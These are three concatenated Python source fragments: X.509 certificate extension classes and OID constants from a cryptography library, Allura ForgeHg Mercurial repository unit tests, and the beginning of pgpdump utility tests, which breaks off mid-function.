def __repr__(self):
return ("<Extension(oid={0.oid}, critical={0.critical}, "
"value={0.value})>").format(self)
def __eq__(self, other):
if not isinstance(other, Extension):
return NotImplemented
return (
self.oid == other.oid and
self.critical == other.critical and
self.value == other.value
)
def __ne__(self, other):
return not self == other
class ExtendedKeyUsage(object):
def __init__(self, usages):
if not all(isinstance(x, ObjectIdentifier) for x in usages):
raise TypeError(
"Every item in the usages list must be an ObjectIdentifier"
)
self._usages = usages
def __iter__(self):
return iter(self._usages)
def __len__(self):
return len(self._usages)
def __repr__(self):
return "<ExtendedKeyUsage({0})>".format(self._usages)
def __eq__(self, other):
if not isinstance(other, ExtendedKeyUsage):
return NotImplemented
return self._usages == other._usages
def __ne__(self, other):
return not self == other
class OCSPNoCheck(object):
pass
class BasicConstraints(object):
def __init__(self, ca, path_length):
if not isinstance(ca, bool):
raise TypeError("ca must be a boolean value")
if path_length is not None and not ca:
raise ValueError("path_length must be None when ca is False")
if (
path_length is not None and
(not isinstance(path_length, six.integer_types) or path_length < 0)
):
raise TypeError(
"path_length must be a non-negative integer or None"
)
self._ca = ca
self._path_length = path_length
ca = utils.read_only_property("_ca")
path_length = utils.read_only_property("_path_length")
def __repr__(self):
return ("<BasicConstraints(ca={0.ca}, "
"path_length={0.path_length})>").format(self)
def __eq__(self, other):
if not isinstance(other, BasicConstraints):
return NotImplemented
return self.ca == other.ca and self.path_length == other.path_length
def __ne__(self, other):
return not self == other
class KeyUsage(object):
def __init__(self, digital_signature, content_commitment, key_encipherment,
data_encipherment, key_agreement, key_cert_sign, crl_sign,
encipher_only, decipher_only):
if not key_agreement and (encipher_only or decipher_only):
raise ValueError(
"encipher_only and decipher_only can only be true when "
"key_agreement is true"
)
self._digital_signature = digital_signature
self._content_commitment = content_commitment
self._key_encipherment = key_encipherment
self._data_encipherment = data_encipherment
self._key_agreement = key_agreement
self._key_cert_sign = key_cert_sign
self._crl_sign = crl_sign
self._encipher_only = encipher_only
self._decipher_only = decipher_only
digital_signature = utils.read_only_property("_digital_signature")
content_commitment = utils.read_only_property("_content_commitment")
key_encipherment = utils.read_only_property("_key_encipherment")
data_encipherment = utils.read_only_property("_data_encipherment")
key_agreement = utils.read_only_property("_key_agreement")
key_cert_sign = utils.read_only_property("_key_cert_sign")
crl_sign = utils.read_only_property("_crl_sign")
@property
def encipher_only(self):
if not self.key_agreement:
raise ValueError(
"encipher_only is undefined unless key_agreement is true"
)
else:
return self._encipher_only
@property
def decipher_only(self):
if not self.key_agreement:
raise ValueError(
"decipher_only is undefined unless key_agreement is true"
)
else:
return self._decipher_only
def __repr__(self):
try:
encipher_only = self.encipher_only
decipher_only = self.decipher_only
except ValueError:
encipher_only = None
decipher_only = None
return ("<KeyUsage(digital_signature={0.digital_signature}, "
"content_commitment={0.content_commitment}, "
"key_encipherment={0.key_encipherment}, "
"data_encipherment={0.data_encipherment}, "
"key_agreement={0.key_agreement}, "
"key_cert_sign={0.key_cert_sign}, crl_sign={0.crl_sign}, "
"encipher_only={1}, decipher_only={2})>").format(
self, encipher_only, decipher_only)
def __eq__(self, other):
if not isinstance(other, KeyUsage):
return NotImplemented
return (
self.digital_signature == other.digital_signature and
self.content_commitment == other.content_commitment and
self.key_encipherment == other.key_encipherment and
self.data_encipherment == other.data_encipherment and
self.key_agreement == other.key_agreement and
self.key_cert_sign == other.key_cert_sign and
self.crl_sign == other.crl_sign and
self._encipher_only == other._encipher_only and
self._decipher_only == other._decipher_only
)
def __ne__(self, other):
return not self == other
class AuthorityInformationAccess(object):
def __init__(self, descriptions):
if not all(isinstance(x, AccessDescription) for x in descriptions):
raise TypeError(
"Every item in the descriptions list must be an "
"AccessDescription"
)
self._descriptions = descriptions
def __iter__(self):
return iter(self._descriptions)
def __len__(self):
return len(self._descriptions)
def __repr__(self):
return "<AuthorityInformationAccess({0})>".format(self._descriptions)
def __eq__(self, other):
if not isinstance(other, AuthorityInformationAccess):
return NotImplemented
return self._descriptions == other._descriptions
def __ne__(self, other):
return not self == other
class AccessDescription(object):
def __init__(self, access_method, access_location):
if not (access_method == OID_OCSP or access_method == OID_CA_ISSUERS):
raise ValueError(
"access_method must be OID_OCSP or OID_CA_ISSUERS"
)
if not isinstance(access_location, GeneralName):
raise TypeError("access_location must be a GeneralName")
self._access_method = access_method
self._access_location = access_location
def __repr__(self):
return (
"<AccessDescription(access_method={0.access_method}, access_locati"
"on={0.access_location})>".format(self)
)
def __eq__(self, other):
if not isinstance(other, AccessDescription):
return NotImplemented
return (
self.access_method == other.access_method and
self.access_location == other.access_location
)
def __ne__(self, other):
return not self == other
access_method = utils.read_only_property("_access_method")
access_location = utils.read_only_property("_access_location")
class CertificatePolicies(object):
def __init__(self, policies):
if not all(isinstance(x, PolicyInformation) for x in policies):
raise TypeError(
"Every item in the policies list must be a "
"PolicyInformation"
)
self._policies = policies
def __iter__(self):
return iter(self._policies)
def __len__(self):
return len(self._policies)
def __repr__(self):
return "<CertificatePolicies({0})>".format(self._policies)
def __eq__(self, other):
if not isinstance(other, CertificatePolicies):
return NotImplemented
return self._policies == other._policies
def __ne__(self, other):
return not self == other
class PolicyInformation(object):
def __init__(self, policy_identifier, policy_qualifiers):
if not isinstance(policy_identifier, ObjectIdentifier):
raise TypeError("policy_identifier must be an ObjectIdentifier")
self._policy_identifier = policy_identifier
if policy_qualifiers and not all(
isinstance(
x, (six.text_type, UserNotice)
) for x in policy_qualifiers
):
raise TypeError(
"policy_qualifiers must be a list of strings and/or UserNotice"
" objects or None"
)
self._policy_qualifiers = policy_qualifiers
def __repr__(self):
return (
"<PolicyInformation(policy_identifier={0.policy_identifier}, polic"
"y_qualifiers={0.policy_qualifiers})>".format(self)
)
def __eq__(self, other):
if not isinstance(other, PolicyInformation):
return NotImplemented
return (
self.policy_identifier == other.policy_identifier and
self.policy_qualifiers == other.policy_qualifiers
)
def __ne__(self, other):
return not self == other
policy_identifier = utils.read_only_property("_policy_identifier")
policy_qualifiers = utils.read_only_property("_policy_qualifiers")
class UserNotice(object):
def __init__(self, notice_reference, explicit_text):
if notice_reference and not isinstance(
notice_reference, NoticeReference
):
raise TypeError(
"notice_reference must be None or a NoticeReference"
)
self._notice_reference = notice_reference
self._explicit_text = explicit_text
def __repr__(self):
return (
"<UserNotice(notice_reference={0.notice_reference}, explicit_text="
"{0.explicit_text!r})>".format(self)
)
def __eq__(self, other):
if not isinstance(other, UserNotice):
return NotImplemented
return (
self.notice_reference == other.notice_reference and
self.explicit_text == other.explicit_text
)
def __ne__(self, other):
return not self == other
notice_reference = utils.read_only_property("_notice_reference")
explicit_text = utils.read_only_property("_explicit_text")
class NoticeReference(object):
def __init__(self, organization, notice_numbers):
self._organization = organization
if not isinstance(notice_numbers, list) or not all(
isinstance(x, int) for x in notice_numbers
):
raise TypeError(
"notice_numbers must be a list of integers"
)
self._notice_numbers = notice_numbers
def __repr__(self):
return (
"<NoticeReference(organization={0.organization!r}, notice_numbers="
"{0.notice_numbers})>".format(self)
)
def __eq__(self, other):
if not isinstance(other, NoticeReference):
return NotImplemented
return (
self.organization == other.organization and
self.notice_numbers == other.notice_numbers
)
def __ne__(self, other):
return not self == other
organization = utils.read_only_property("_organization")
notice_numbers = utils.read_only_property("_notice_numbers")
class SubjectKeyIdentifier(object):
def __init__(self, digest):
self._digest = digest
digest = utils.read_only_property("_digest")
def __repr__(self):
return "<SubjectKeyIdentifier(digest={0!r})>".format(self.digest)
def __eq__(self, other):
if not isinstance(other, SubjectKeyIdentifier):
return NotImplemented
return (
self.digest == other.digest
)
def __ne__(self, other):
return not self == other
class CRLDistributionPoints(object):
def __init__(self, distribution_points):
if not all(
isinstance(x, DistributionPoint) for x in distribution_points
):
raise TypeError(
"distribution_points must be a list of DistributionPoint "
"objects"
)
self._distribution_points = distribution_points
def __iter__(self):
return iter(self._distribution_points)
def __len__(self):
return len(self._distribution_points)
def __repr__(self):
return "<CRLDistributionPoints({0})>".format(self._distribution_points)
def __eq__(self, other):
if not isinstance(other, CRLDistributionPoints):
return NotImplemented
return self._distribution_points == other._distribution_points
def __ne__(self, other):
return not self == other
class DistributionPoint(object):
def __init__(self, full_name, relative_name, reasons, crl_issuer):
if full_name and relative_name:
raise ValueError(
"At least one of full_name and relative_name must be None"
)
if full_name and not all(
isinstance(x, GeneralName) for x in full_name
):
raise TypeError(
"full_name must be a list of GeneralName objects"
)
if relative_name and not isinstance(relative_name, Name):
raise TypeError("relative_name must be a Name")
if crl_issuer and not all(
isinstance(x, GeneralName) for x in crl_issuer
):
raise TypeError(
"crl_issuer must be None or a list of general names"
)
if reasons and (not isinstance(reasons, frozenset) or not all(
isinstance(x, ReasonFlags) for x in reasons
)):
raise TypeError("reasons must be None or frozenset of ReasonFlags")
if reasons and (
ReasonFlags.unspecified in reasons or
ReasonFlags.remove_from_crl in reasons
):
raise ValueError(
"unspecified and remove_from_crl are not valid reasons in a "
"DistributionPoint"
)
if reasons and not crl_issuer and not (full_name or relative_name):
raise ValueError(
"You must supply crl_issuer, full_name, or relative_name when "
"reasons is not None"
)
self._full_name = full_name
self._relative_name = relative_name
self._reasons = reasons
self._crl_issuer = crl_issuer
def __repr__(self):
return (
"<DistributionPoint(full_name={0.full_name}, relative_name={0.rela"
"tive_name}, reasons={0.reasons}, crl_issuer={0.crl_is"
"suer})>".format(self)
)
def __eq__(self, other):
if not isinstance(other, DistributionPoint):
return NotImplemented
return (
self.full_name == other.full_name and
self.relative_name == other.relative_name and
self.reasons == other.reasons and
self.crl_issuer == other.crl_issuer
)
def __ne__(self, other):
return not self == other
full_name = utils.read_only_property("_full_name")
relative_name = utils.read_only_property("_relative_name")
reasons = utils.read_only_property("_reasons")
crl_issuer = utils.read_only_property("_crl_issuer")
class ReasonFlags(Enum):
unspecified = "unspecified"
key_compromise = "keyCompromise"
ca_compromise = "cACompromise"
affiliation_changed = "affiliationChanged"
superseded = "superseded"
cessation_of_operation = "cessationOfOperation"
certificate_hold = "certificateHold"
privilege_withdrawn = "privilegeWithdrawn"
aa_compromise = "aACompromise"
remove_from_crl = "removeFromCRL"
class InhibitAnyPolicy(object):
def __init__(self, skip_certs):
if not isinstance(skip_certs, six.integer_types):
raise TypeError("skip_certs must be an integer")
if skip_certs < 0:
raise ValueError("skip_certs must be a non-negative integer")
self._skip_certs = skip_certs
def __repr__(self):
return "<InhibitAnyPolicy(skip_certs={0.skip_certs})>".format(self)
def __eq__(self, other):
if not isinstance(other, InhibitAnyPolicy):
return NotImplemented
return self.skip_certs == other.skip_certs
def __ne__(self, other):
return not self == other
skip_certs = utils.read_only_property("_skip_certs")
@six.add_metaclass(abc.ABCMeta)
class GeneralName(object):
@abc.abstractproperty
def value(self):
"""
Return the value of the object
"""
@utils.register_interface(GeneralName)
class RFC822Name(object):
def __init__(self, value):
if not isinstance(value, six.text_type):
raise TypeError("value must be a unicode string")
self._value = value
value = utils.read_only_property("_value")
def __repr__(self):
return "<RFC822Name(value={0})>".format(self.value)
def __eq__(self, other):
if not isinstance(other, RFC822Name):
return NotImplemented
return self.value == other.value
def __ne__(self, other):
return not self == other
@utils.register_interface(GeneralName)
class DNSName(object):
def __init__(self, value):
if not isinstance(value, six.text_type):
raise TypeError("value must be a unicode string")
self._value = value
value = utils.read_only_property("_value")
def __repr__(self):
return "<DNSName(value={0})>".format(self.value)
def __eq__(self, other):
if not isinstance(other, DNSName):
return NotImplemented
return self.value == other.value
def __ne__(self, other):
return not self == other
@utils.register_interface(GeneralName)
class UniformResourceIdentifier(object):
def __init__(self, value):
if not isinstance(value, six.text_type):
raise TypeError("value must be a unicode string")
self._value = value
value = utils.read_only_property("_value")
def __repr__(self):
return "<UniformResourceIdentifier(value={0})>".format(self.value)
def __eq__(self, other):
if not isinstance(other, UniformResourceIdentifier):
return NotImplemented
return self.value == other.value
def __ne__(self, other):
return not self == other
@utils.register_interface(GeneralName)
class DirectoryName(object):
def __init__(self, value):
if not isinstance(value, Name):
raise TypeError("value must be a Name")
self._value = value
value = utils.read_only_property("_value")
def __repr__(self):
return "<DirectoryName(value={0})>".format(self.value)
def __eq__(self, other):
if not isinstance(other, DirectoryName):
return NotImplemented
return self.value == other.value
def __ne__(self, other):
return not self == other
@utils.register_interface(GeneralName)
class RegisteredID(object):
def __init__(self, value):
if not isinstance(value, ObjectIdentifier):
raise TypeError("value must be an ObjectIdentifier")
self._value = value
value = utils.read_only_property("_value")
def __repr__(self):
return "<RegisteredID(value={0})>".format(self.value)
def __eq__(self, other):
if not isinstance(other, RegisteredID):
return NotImplemented
return self.value == other.value
def __ne__(self, other):
return not self == other
@utils.register_interface(GeneralName)
class IPAddress(object):
def __init__(self, value):
if not isinstance(
value,
(
ipaddress.IPv4Address,
ipaddress.IPv6Address,
ipaddress.IPv4Network,
ipaddress.IPv6Network
)
):
raise TypeError(
"value must be an instance of ipaddress.IPv4Address, "
"ipaddress.IPv6Address, ipaddress.IPv4Network, or "
"ipaddress.IPv6Network"
)
self._value = value
value = utils.read_only_property("_value")
def __repr__(self):
return "<IPAddress(value={0})>".format(self.value)
def __eq__(self, other):
if not isinstance(other, IPAddress):
return NotImplemented
return self.value == other.value
def __ne__(self, other):
return not self == other
class GeneralNames(object):
def __init__(self, general_names):
if not all(isinstance(x, GeneralName) for x in general_names):
raise TypeError(
"Every item in the general_names list must be an "
"object conforming to the GeneralName interface"
)
self._general_names = general_names
def __iter__(self):
return iter(self._general_names)
def __len__(self):
return len(self._general_names)
def get_values_for_type(self, type):
return [i.value for i in self if isinstance(i, type)]
def __repr__(self):
return "<GeneralNames({0})>".format(self._general_names)
def __eq__(self, other):
if not isinstance(other, GeneralNames):
return NotImplemented
return self._general_names == other._general_names
def __ne__(self, other):
return not self == other
class SubjectAlternativeName(object):
def __init__(self, general_names):
self._general_names = GeneralNames(general_names)
def __iter__(self):
return iter(self._general_names)
def __len__(self):
return len(self._general_names)
def get_values_for_type(self, type):
return self._general_names.get_values_for_type(type)
def __repr__(self):
return "<SubjectAlternativeName({0})>".format(self._general_names)
def __eq__(self, other):
if not isinstance(other, SubjectAlternativeName):
return NotImplemented
return self._general_names == other._general_names
def __ne__(self, other):
return not self == other
class IssuerAlternativeName(object):
def __init__(self, general_names):
self._general_names = GeneralNames(general_names)
def __iter__(self):
return iter(self._general_names)
def __len__(self):
return len(self._general_names)
def get_values_for_type(self, type):
return self._general_names.get_values_for_type(type)
def __repr__(self):
return "<IssuerAlternativeName({0})>".format(self._general_names)
def __eq__(self, other):
if not isinstance(other, IssuerAlternativeName):
return NotImplemented
return self._general_names == other._general_names
def __ne__(self, other):
return not self == other
class AuthorityKeyIdentifier(object):
def __init__(self, key_identifier, authority_cert_issuer,
authority_cert_serial_number):
if authority_cert_issuer or authority_cert_serial_number:
if not authority_cert_issuer or not authority_cert_serial_number:
raise ValueError(
"authority_cert_issuer and authority_cert_serial_number "
"must both be present or both None"
)
if not all(
isinstance(x, GeneralName) for x in authority_cert_issuer
):
raise TypeError(
"authority_cert_issuer must be a list of GeneralName "
"objects"
)
if not isinstance(authority_cert_serial_number, six.integer_types):
raise TypeError(
"authority_cert_serial_number must be an integer"
)
self._key_identifier = key_identifier
self._authority_cert_issuer = authority_cert_issuer
self._authority_cert_serial_number = authority_cert_serial_number
def __repr__(self):
return (
"<AuthorityKeyIdentifier(key_identifier={0.key_identifier!r}, "
"authority_cert_issuer={0.authority_cert_issuer}, "
"authority_cert_serial_number={0.authority_cert_serial_number}"
")>".format(self)
)
def __eq__(self, other):
if not isinstance(other, AuthorityKeyIdentifier):
return NotImplemented
return (
self.key_identifier == other.key_identifier and
self.authority_cert_issuer == other.authority_cert_issuer and
self.authority_cert_serial_number ==
other.authority_cert_serial_number
)
def __ne__(self, other):
return not self == other
key_identifier = utils.read_only_property("_key_identifier")
authority_cert_issuer = utils.read_only_property("_authority_cert_issuer")
authority_cert_serial_number = utils.read_only_property(
"_authority_cert_serial_number"
)
OID_COMMON_NAME = ObjectIdentifier("2.5.4.3")
OID_COUNTRY_NAME = ObjectIdentifier("2.5.4.6")
OID_LOCALITY_NAME = ObjectIdentifier("2.5.4.7")
OID_STATE_OR_PROVINCE_NAME = ObjectIdentifier("2.5.4.8")
OID_ORGANIZATION_NAME = ObjectIdentifier("2.5.4.10")
OID_ORGANIZATIONAL_UNIT_NAME = ObjectIdentifier("2.5.4.11")
OID_SERIAL_NUMBER = ObjectIdentifier("2.5.4.5")
OID_SURNAME = ObjectIdentifier("2.5.4.4")
OID_GIVEN_NAME = ObjectIdentifier("2.5.4.42")
OID_TITLE = ObjectIdentifier("2.5.4.12")
OID_GENERATION_QUALIFIER = ObjectIdentifier("2.5.4.44")
OID_DN_QUALIFIER = ObjectIdentifier("2.5.4.46")
OID_PSEUDONYM = ObjectIdentifier("2.5.4.65")
OID_DOMAIN_COMPONENT = ObjectIdentifier("0.9.2342.19200300.100.1.25")
OID_EMAIL_ADDRESS = ObjectIdentifier("1.2.840.113549.1.9.1")
OID_RSA_WITH_MD5 = ObjectIdentifier("1.2.840.113549.1.1.4")
OID_RSA_WITH_SHA1 = ObjectIdentifier("1.2.840.113549.1.1.5")
OID_RSA_WITH_SHA224 = ObjectIdentifier("1.2.840.113549.1.1.14")
OID_RSA_WITH_SHA256 = ObjectIdentifier("1.2.840.113549.1.1.11")
OID_RSA_WITH_SHA384 = ObjectIdentifier("1.2.840.113549.1.1.12")
OID_RSA_WITH_SHA512 = ObjectIdentifier("1.2.840.113549.1.1.13")
OID_ECDSA_WITH_SHA224 = ObjectIdentifier("1.2.840.10045.4.3.1")
OID_ECDSA_WITH_SHA256 = ObjectIdentifier("1.2.840.10045.4.3.2")
OID_ECDSA_WITH_SHA384 = ObjectIdentifier("1.2.840.10045.4.3.3")
OID_ECDSA_WITH_SHA512 = ObjectIdentifier("1.2.840.10045.4.3.4")
OID_DSA_WITH_SHA1 = ObjectIdentifier("1.2.840.10040.4.3")
OID_DSA_WITH_SHA224 = ObjectIdentifier("2.16.840.1.101.3.4.3.1")
OID_DSA_WITH_SHA256 = ObjectIdentifier("2.16.840.1.101.3.4.3.2")
_SIG_OIDS_TO_HASH = {
OID_RSA_WITH_MD5.dotted_string: hashes.MD5(),
OID_RSA_WITH_SHA1.dotted_string: hashes.SHA1(),
OID_RSA_WITH_SHA224.dotted_string: hashes.SHA224(),
OID_RSA_WITH_SHA256.dotted_string: hashes.SHA256(),
OID_RSA_WITH_SHA384.dotted_string: hashes.SHA384(),
OID_RSA_WITH_SHA512.dotted_string: hashes.SHA512(),
OID_ECDSA_WITH_SHA224.dotted_string: hashes.SHA224(),
OID_ECDSA_WITH_SHA256.dotted_string: hashes.SHA256(),
OID_ECDSA_WITH_SHA384.dotted_string: hashes.SHA384(),
OID_ECDSA_WITH_SHA512.dotted_string: hashes.SHA512(),
OID_DSA_WITH_SHA1.dotted_string: hashes.SHA1(),
OID_DSA_WITH_SHA224.dotted_string: hashes.SHA224(),
OID_DSA_WITH_SHA256.dotted_string: hashes.SHA256()
}
OID_SERVER_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.1")
OID_CLIENT_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.2")
OID_CODE_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.3")
OID_EMAIL_PROTECTION = ObjectIdentifier("1.3.6.1.5.5.7.3.4")
OID_TIME_STAMPING = ObjectIdentifier("1.3.6.1.5.5.7.3.8")
OID_OCSP_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.9")
OID_CA_ISSUERS = ObjectIdentifier("1.3.6.1.5.5.7.48.2")
OID_OCSP = ObjectIdentifier("1.3.6.1.5.5.7.48.1")
OID_CPS_QUALIFIER = ObjectIdentifier("1.3.6.1.5.5.7.2.1")
OID_CPS_USER_NOTICE = ObjectIdentifier("1.3.6.1.5.5.7.2.2")
OID_ANY_POLICY = ObjectIdentifier("2.5.29.32.0")
@six.add_metaclass(abc.ABCMeta)
class Certificate(object):
@abc.abstractmethod
def fingerprint(self, algorithm):
"""
Returns bytes using digest passed.
"""
@abc.abstractproperty
def serial(self):
"""
Returns certificate serial number
"""
@abc.abstractproperty
def version(self):
"""
Returns the certificate version
"""
@abc.abstractmethod
def public_key(self):
"""
Returns the public key
"""
@abc.abstractproperty
def not_valid_before(self):
"""
Not before time (represented as UTC datetime)
"""
@abc.abstractproperty
def not_valid_after(self):
"""
Not after time (represented as UTC datetime)
"""
@abc.abstractproperty
def issuer(self):
"""
Returns the issuer name object.
"""
@abc.abstractproperty
def subject(self):
"""
Returns the subject name object.
"""
@abc.abstractproperty
def signature_hash_algorithm(self):
"""
Returns a HashAlgorithm corresponding to the type of the digest signed
in the certificate.
"""
@abc.abstractproperty
def extensions(self):
"""
Returns an Extensions object.
"""
@abc.abstractmethod
def __eq__(self, other):
"""
Checks equality.
"""
@abc.abstractmethod
def __ne__(self, other):
"""
Checks not equal.
"""
@abc.abstractmethod
def public_bytes(self, encoding):
"""
Serializes the certificate to PEM or DER format.
"""
@six.add_metaclass(abc.ABCMeta)
class CertificateRevocationList(object):
@abc.abstractmethod
def fingerprint(self, algorithm):
"""
Returns bytes using digest passed.
"""
@abc.abstractproperty
def signature_hash_algorithm(self):
"""
Returns a HashAlgorithm corresponding to the type of the digest signed
in the certificate.
"""
@abc.abstractproperty
def issuer(self):
"""
Returns the X509Name with the issuer of this CRL.
"""
@abc.abstractproperty
def next_update(self):
"""
Returns the date of next update for this CRL.
"""
@abc.abstractproperty
def last_update(self):
"""
Returns the date of last update for this CRL.
"""
@abc.abstractproperty
def revoked_certificates(self):
"""
Returns a list of RevokedCertificate objects for this CRL.
"""
@abc.abstractproperty
def extensions(self):
"""
Returns an Extensions object containing a list of CRL extensions.
"""
@abc.abstractmethod
def __eq__(self, other):
"""
Checks equality.
"""
@abc.abstractmethod
def __ne__(self, other):
"""
Checks not equal.
"""
@six.add_metaclass(abc.ABCMeta)
class CertificateSigningRequest(object):
@abc.abstractmethod
def public_key(self):
"""
Returns the public key
"""
@abc.abstractproperty
def subject(self):
"""
Returns the subject name object.
"""
@abc.abstractproperty
def signature_hash_algorithm(self):
"""
Returns a HashAlgorithm corresponding to the type of the digest signed
in the certificate.
"""
@abc.abstractproperty
def extensions(self):
"""
Returns the extensions in the signing request.
"""
@abc.abstractmethod
def public_bytes(self, encoding):
"""
Encodes the request to PEM or DER format.
"""
@six.add_metaclass(abc.ABCMeta)
class RevokedCertificate(object):
@abc.abstractproperty
def serial_number(self):
"""
Returns the serial number of the revoked certificate.
"""
@abc.abstractproperty
def revocation_date(self):
"""
Returns the date of when this certificate was revoked.
"""
@abc.abstractproperty
def extensions(self):
"""
Returns an Extensions object containing a list of Revoked extensions.
"""
|
|
import os
import shutil
import unittest
import pkg_resources
import mock
from ming.base import Object
from ming.orm import ThreadLocalORMSession
from alluratest.controller import setup_basic_test, setup_global_objects
from allura.lib import helpers as h
from allura.tests import decorators as td
from allura.tests.model.test_repo import RepoImplTestBase
from allura import model as M
from forgehg import model as HM
class TestNewRepo(unittest.TestCase):
def setUp(self):
setup_basic_test()
self.setup_with_tools()
@td.with_hg
def setup_with_tools(self):
setup_global_objects()
h.set_context('test', 'src-hg', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgehg', 'tests/data')
self.repo = HM.Repository(
name='testrepo.hg',
fs_path=repo_dir,
url_path = '/test/',
tool = 'hg',
status = 'creating')
self.repo.refresh()
self.rev = M.repo.Commit.query.get(_id=self.repo.heads[0]['object_id'])
self.rev.repo = self.repo
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_redo_trees(self):
old_tree = self.rev.tree
del self.rev.tree
M.repo.Tree.query.remove()
ThreadLocalORMSession.close_all()
new_tree = self.rev.tree
self.assertEqual(old_tree.tree_ids, new_tree.tree_ids)
self.assertEqual(old_tree.blob_ids, new_tree.blob_ids)
self.assertEqual(old_tree._id, new_tree._id)
def test_commit(self):
assert self.rev.primary() is self.rev
assert self.rev.index_id().startswith('allura/model/repo/Commit#')
self.rev.author_url
self.rev.committer_url
assert self.rev.tree._id == self.rev.tree_id
assert self.rev.summary == self.rev.message.splitlines()[0]
assert self.rev.shorthand_id() == '[5a0a99]'
assert self.rev.symbolic_ids == (['default'], ['tip'])
assert self.rev.url() == (
'/p/test/src-hg/ci/'
'5a0a993efa9bce7d1983344261393e841fcfd65d/')
all_cis = self.rev.log(0, 1000)
assert len(all_cis) == 6
assert self.rev.log(1,1000) == all_cis[1:]
assert self.rev.log(0,3) == all_cis[:3]
assert self.rev.log(1,2) == all_cis[1:3]
for ci in all_cis:
ci.count_revisions()
ci.context()
self.rev.tree.ls()
assert self.rev.tree.readme() == (
'README', 'This is readme\nAnother line\n')
assert self.rev.tree.path() == '/'
assert self.rev.tree.url() == (
'/p/test/src-hg/ci/'
'5a0a993efa9bce7d1983344261393e841fcfd65d/'
'tree/')
self.rev.tree.by_name['README']
assert self.rev.tree.is_blob('README') == True
class TestHgRepo(unittest.TestCase, RepoImplTestBase):
def setUp(self):
setup_basic_test()
self.setup_with_tools()
@td.with_hg
def setup_with_tools(self):
setup_global_objects()
h.set_context('test', 'src-hg', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgehg', 'tests/data')
self.repo = HM.Repository(
name='testrepo.hg',
fs_path=repo_dir,
url_path = '/test/',
tool = 'hg',
status = 'creating')
self.repo.refresh()
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_init(self):
repo = HM.Repository(
name='testrepo.hg',
fs_path='/tmp/',
url_path = '/test/',
tool = 'hg',
status = 'creating')
dirname = os.path.join(repo.fs_path, repo.name)
if os.path.exists(dirname):
shutil.rmtree(dirname)
repo.init()
shutil.rmtree(dirname)
def test_clone(self):
repo = HM.Repository(
name='testrepo.hg',
fs_path='/tmp/',
url_path = '/test/',
tool = 'hg',
status = 'creating')
repo_path = pkg_resources.resource_filename(
'forgehg', 'tests/data/testrepo.hg')
dirname = os.path.join(repo.fs_path, repo.name)
if os.path.exists(dirname):
shutil.rmtree(dirname)
repo.init()
repo._impl.clone_from(repo_path)
assert len(repo.log())
shutil.rmtree(dirname)
def test_index(self):
i = self.repo.index()
assert i['type_s'] == 'Hg Repository', i
def test_log(self):
for entry in self.repo.log():
if entry._id.startswith('00000000'): continue
assert entry.committed.email == 'rick446@usa.net'
assert entry.message
def test_revision(self):
entry = self.repo.commit('tip')
assert entry.committed.email == 'rick446@usa.net'
assert entry.message
# Test that sha1s for named refs are looked up in cache first, instead
# of from disk.
with mock.patch('forgehg.model.hg.M.repo.Commit.query') as q:
self.repo.heads.append(Object(name='HEAD', object_id='deadbeef'))
self.repo.commit('HEAD')
q.get.assert_called_with(_id='deadbeef')
class TestHgCommit(unittest.TestCase):
def setUp(self):
setup_basic_test()
self.setup_with_tools()
@td.with_hg
def setup_with_tools(self):
setup_global_objects()
h.set_context('test', 'src-hg', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgehg', 'tests/data')
self.repo = HM.Repository(
name='testrepo.hg',
fs_path=repo_dir,
url_path = '/test/',
tool = 'hg',
status = 'creating')
self.repo.refresh()
self.rev = self.repo.commit('tip')
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_redo_trees(self):
old_tree = self.rev.tree
del self.rev.tree
M.repo.Tree.query.remove(dict(type='tree'))
ThreadLocalORMSession.close_all()
new_tree = self.rev.tree
self.assertEqual(old_tree.tree_ids, new_tree.tree_ids)
self.assertEqual(old_tree.blob_ids, new_tree.blob_ids)
self.assertEqual(old_tree._id, new_tree._id)
def test_url(self):
assert self.rev.url().endswith('cfd65d/'), \
self.rev.url()
def test_committer_url(self):
assert self.rev.committer_url is None
def test_primary(self):
assert self.rev.primary() == self.rev
def test_shorthand(self):
assert len(self.rev.shorthand_id()) == 8
def test_diff(self):
diffs = (self.rev.diffs.added
+self.rev.diffs.removed
+self.rev.diffs.changed
+self.rev.diffs.copied)
for d in diffs:
print d
|
|
import base64
from datetime import datetime
from itertools import repeat
import os.path
from unittest import main, TestCase
from pgpdump import AsciiData, BinaryData
from pgpdump.packet import (TAG_TYPES, SignaturePacket, PublicKeyPacket,
PublicSubkeyPacket, UserIDPacket, old_tag_length, new_tag_length,
SecretKeyPacket, SecretSubkeyPacket)
from pgpdump.utils import (PgpdumpException, crc24, get_int8, get_mpi,
get_key_id, get_int_bytes, same_key)
class UtilsTestCase(TestCase):
def test_crc24(self):
self.assertEqual(0xb704ce, crc24(bytearray(b"")))
self.assertEqual(0x21cf02, crc24(bytearray(b"123456789")))
self.assertEqual(0xe84567, crc24(repeat(0, 1024 * 1024)))
#self.assertEqual(0x03ebb7, crc24(repeat(0, 10 * 1024 * 1024)))
#self.assertEqual(0x5c0542, crc24(repeat(0, 30 * 1024 * 1024)))
# get_int2, get_int4 are tested plenty by actual code
def test_int8(self):
data = [
(0, [0x00] * 8),
(0x0a0b0c0d, (0x00, 0x00, 0x00, 0x00, 0x0a, 0x0b, 0x0c, 0x0d)),
(0x0a0b0c0d << 32, bytearray(b'\x0a\x0b\x0c\x0d\x00\x00\x00\x00')),
]
for expected, invals in data:
self.assertEqual(expected, get_int8(invals, 0))
def test_mpi(self):
data = [
(1, 3, (0x00, 0x01, 0x01)),
(511, 4, (0x00, 0x09, 0x01, 0xff)),
(65537, 5, bytearray(b'\x00\x11\x01\x00\x01')),
]
for expected, offset, invals in data:
self.assertEqual((expected, offset), get_mpi(invals, 0))
def test_key_id(self):
self.assertEqual(b"5C2E46A0F53A76ED",
get_key_id(b"\\.F\xa0\xf5:v\xed", 0))
def test_int_bytes(self):
self.assertEqual(b"\x11", get_int_bytes(17))
self.assertEqual(b"\x01\x00\x01", get_int_bytes(65537))
def test_same_key(self):
